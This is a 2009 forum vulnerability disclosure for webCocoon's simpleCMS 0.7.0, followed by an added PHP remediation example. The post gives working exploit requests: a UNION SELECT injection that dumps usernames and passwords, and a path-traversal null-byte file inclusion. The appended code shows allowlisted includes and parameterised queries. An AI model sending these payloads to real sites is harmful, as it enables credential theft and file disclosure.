
20.12.2009, 17:44
webCocoon's simpleCMS Vuln's
webCocoon's simpleCMS
Web site : http://webcocoon.wordpress.com
Version : 0.7.0
SQL Injection
Vuln file: /content/post/show.php [line:3]
PHP code:
//Show post
$get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result = mysql_num_rows($get_post);
$post = mysql_fetch_array($get_post);
Exploit:
if magic_quotes = OFF
Code:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
id=xek' union select null,concat_ws(0x3a,username,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null from user -- &mode=post&gfile=show
*the parameters year, month, date are also vulnerable
Local File Inclusion
Vuln file: /templates/default/template.html [line:538]
PHP code:
if($mode == ""){
include"content/front/$template.php";
}
elseif($gfile == "$gfile"){
include"content/$mode/$gfile.php";
}else{
include"content/front/$template.php";
}
Exploit:
if magic_quotes = OFF
Code:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
mode=../../../../../../../[local_file]%00&gfile=browse
Last edited by RulleR; 20.12.2009 at 17:51.
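
Hardened forms of the two code paths quoted in the post, as an added example that is not part of the original post or of simpleCMS. The function names, the ROUTES allowlist contents, the assumption that post_id is numeric, and the in-memory SQLite database (standing in for the MySQL backend) are all assumptions made for illustration.

```php
<?php
// Added example: allowlist-based include dispatch and a parameterised query.
// ROUTES and the sample database below are constructed, not taken from simpleCMS.

const ROUTES = [                       // hypothetical allowlist: mode => permitted gfile values
    'post'  => ['show', 'browse'],
    'front' => ['default'],
];

// Resolve mode/gfile to a script path, or null if the pair is not allowlisted.
function resolve_include(string $base, string $mode, string $gfile): ?string
{
    if (!isset(ROUTES[$mode]) || !in_array($gfile, ROUTES[$mode], true)) {
        return null;                   // rejects "../" sequences and NUL bytes outright
    }
    return "$base/content/$mode/$gfile.php";
}

// Fetch a published post with a bound parameter instead of string interpolation.
function fetch_post(PDO $db, string $id): ?array
{
    if (!ctype_digit($id)) {
        return null;                   // assumption: post_id is a non-negative integer
    }
    $stmt = $db->prepare("SELECT * FROM post WHERE post_id = ? AND status = 'published'");
    $stmt->execute([(int)$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory data so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE post (post_id INTEGER, title TEXT, status TEXT)");
$db->exec("INSERT INTO post VALUES (1, 'Hello', 'published'), (2, 'Draft', 'draft')");

// Valid id, non-numeric id, allowlisted route, traversal attempt in mode.
var_dump(fetch_post($db, '1')['title'] ?? null);
var_dump(fetch_post($db, "1' OR '1'='1"));
var_dump(resolve_include(__DIR__, 'post', 'show') !== null);
var_dump(resolve_include(__DIR__, '../../../secret', 'browse'));
```

Neither fix depends on magic_quotes; the same bound-parameter approach applies to the year, month and date parameters the post lists.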